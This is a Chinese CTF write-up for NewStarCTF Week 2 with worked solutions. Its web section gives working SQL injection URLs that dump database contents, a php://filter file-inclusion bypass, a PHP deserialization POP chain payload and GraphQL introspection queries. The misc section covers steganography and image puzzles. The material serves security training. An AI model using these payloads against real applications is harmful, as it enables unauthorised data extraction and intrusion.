BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

---

WEEK2

WEB

Word-For-You(2 Gen)

题目描述

哇哇哇，我把查询界面改了，现在你们不能从数据库中拿到东西了吧哈哈（不过为了调试的代码似乎忘记删除了

报错注入

/comments.php?name=1'and updatexml(1,concat(0x7e,database(),0x7e),1)--+

Current Database: wfy

/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=database()),0x7e),1)--+

Tables in database(wfy): wfy_admin,wfy_comments,wfy_information

/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wfy_comments'),0x7e),1)--+

Columns in table(wfy_comments): id,text,user,name,display

/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(text),30) from wfy.wfy_comments),0x7e),1)--+

IncludeOne

 <?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
    if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Baby Hacker?";
    }
}else{
    echo "No Hacker!";
} Hint: 1219893521

首先爆破伪随机数：https://www.openwall.com/php_mt_seed/

root@mochu7-pc:/mnt/d/Tools/Web/CTF/php_mt_seed# ./php_mt_seed 1219893521
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 18382.0 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x0011793a = 1145146 (PHP 7.1.0+)
Found 1, trying 0x16000000 - 0x17ffffff, speed 183.6 Mseeds/s
seed = 0x161c5abb = 370956987 (PHP 5.2.1 to 7.0.x; HHVM)
Found 2, trying 0x64000000 - 0x65ffffff, speed 177.0 Mseeds/s
seed = 0x64a22f28 = 1688350504 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x64a22f28 = 1688350504 (PHP 7.1.0+)
Found 4, trying 0xc4000000 - 0xc5ffffff, speed 170.5 Mseeds/s
seed = 0xc4b59923 = 3300235555 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4b59923 = 3300235555 (PHP 7.1.0+)
seed = 0xc4efe664 = 3304056420 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4efe664 = 3304056420 (PHP 7.1.0+)
Found 8, trying 0xfe000000 - 0xffffffff, speed 168.2 Mseeds/s
Found 8

PS C:\Users\Administrator\Downloads> php -r "mt_srand(1145146);mt_rand();var_dump(mt_rand());"
Command line code:1:
int(1202031004)

第二层使用伪协议，php://filter/协议自带一层url解码，这样双层url编码可以绕这里的过滤，至于NewStar关键字可以用管道符分隔开用作过滤器(错误的过滤器也不会报错)

/?file=php://filter/read=convert.ba%25%37%33e64-encode|NewStar/resource=flag.php

guess=1202031004

PS C:\Users\Administrator\Downloads> php -r "var_dump(base64_decode('PD9waHAgLy9mbGFnezc4YWY5ZjhhLTljMGUtNDJmNS1hYmY5LWFkOWUyY2FhZjE0Nn0K'));"
Command line code:1:
string(51) "<?php //flag{78af9f8a-9c0e-42f5-abf9-ad9e2caaf146}
"

UnserializeOne

 <?php
error_reporting(0);
highlight_file(__FILE__);
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

POP链

Sec::__invoke() <- Start::__isset() <- eeee::__clone() <- Easy::__call() <- Sec::__toString() <- Start::__destruct()

<?php 
class Start{
    public $name;
    public $func;
}

class Sec{
    public $obj;
    public $var;
}

class Easy{
    public $cla;
}

class eeee{
    public $obj;
}
$start = new Start();
$sec = new Sec();
$easy = new Easy();
$eeee = new eeee();
$eeee->obj = $start;
$sec->obj = $easy;
$sec->var = $eeee;
$start->name = $sec;
$start->func = $sec;
echo serialize($start);
 ?>

O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";r:1;}}s:4:"func";r:2;}

ezAPI

www.zip提供了源码

<?php
                error_reporting(0);
                $id = $_POST['id'];
                function waf($str)
                {
                    if (!is_numeric($str) || preg_replace("/[0-9]/", "", $str) !== "") {
                        return False;
                    } else {
                        return True;
                    }
                }

                function send($data)
                {
                    $options = array(
                        'http' => array(
                            'method' => 'POST',
                            'header' => 'Content-type: application/json',
                            'content' => $data,
                            'timeout' => 10 * 60
                        )
                    );
                    $context = stream_context_create($options);
                    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
                    return $result;
                }

                if (isset($id)) {
                    if (waf($id)) {
                        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';
                        $res = json_decode(send($data));
                        if ($res->data->users_user_by_pk->name !== NULL) {
                            echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
                        } else {
                            echo "<b>Can't found it!</b><br><br>DEBUG: ";
                            var_dump($res->data);
                        }
                    } else {
                        die("<b>Hacker! Only Number!</b>");
                    }
                } else {
                    die("<b>No Data?</b>");
                }
                ?>

$_POST['data']可以传入GraphQL查询语句

开启了Debug模式，由于GraphQL自带强大的内省自检机制，可以查询出GraphQL中所有的Query、Mutaion、ObjectType、Field、Arguments。

id=1&data={"query":"\n    query IntrospectionQuery {\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  ","variables":null}

右键查看源码

直接关键字搜索flag，找到了ffffllllaaagggg_1n_h3r3_flag和flag字段，尝试直接查询

id=1&data={"query":"query{ffffllllaaagggg_1n_h3r3_flag{flag}}"}

MISC

Yesec no drumsticks 2

零宽度字符隐写：https://330k.github.io/misc_tools/unicode_steganography.html

Base家族识别：https://basecrack.herokuapp.com/

>>> bytes.fromhex('666c61677b496e6772336431656e745f30465f59657365635f69355f4f4f4f4f4f7d')
b'flag{Ingr3d1ent_0F_Yesec_i5_OOOOO}'

Coldwinds’s Desktop

montage *.PNG -tile 12x12 -geometry 30x30+0+0 flag.png
gaps --image=flag.png --generations=50 --population=144 --size=30 --verbose

flag{Y0u_successfu11y_s01ved_the_puzz1e}

奇怪的二维码

很明显是一种QR Code，但是使用这个：https://products.aspose.app/barcode/recognize#/recognized
识别不出来

code.png末尾附加了一张PNG图片

PS加上中间的定位符就行

然后用这个站：https://products.aspose.app/barcode/recognize#/recognized

识别就行了

flag{Aztec_from_Age_0f_Empires}

qsdz’s girlfriend 2

题目描述

据说qsdz的girlfriend是会变化的猫猫。flag{图片中的文字}

猫变换

from PIL import Image

img = Image.open('girlfriend.png')
if img.mode == "P":
    img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size

st = 0x61
a = 0x726e
b = 0x6f6c64
for _ in range(st):
    with Image.new(img.mode, dim) as canvas:
        for nx in range(img.size[0]):
            for ny in range(img.size[0]):
                y = (ny - nx * a) % width
                x = (nx - y * b) % height
                canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('flag.png')

flag{按理说这个点猪也该醒了}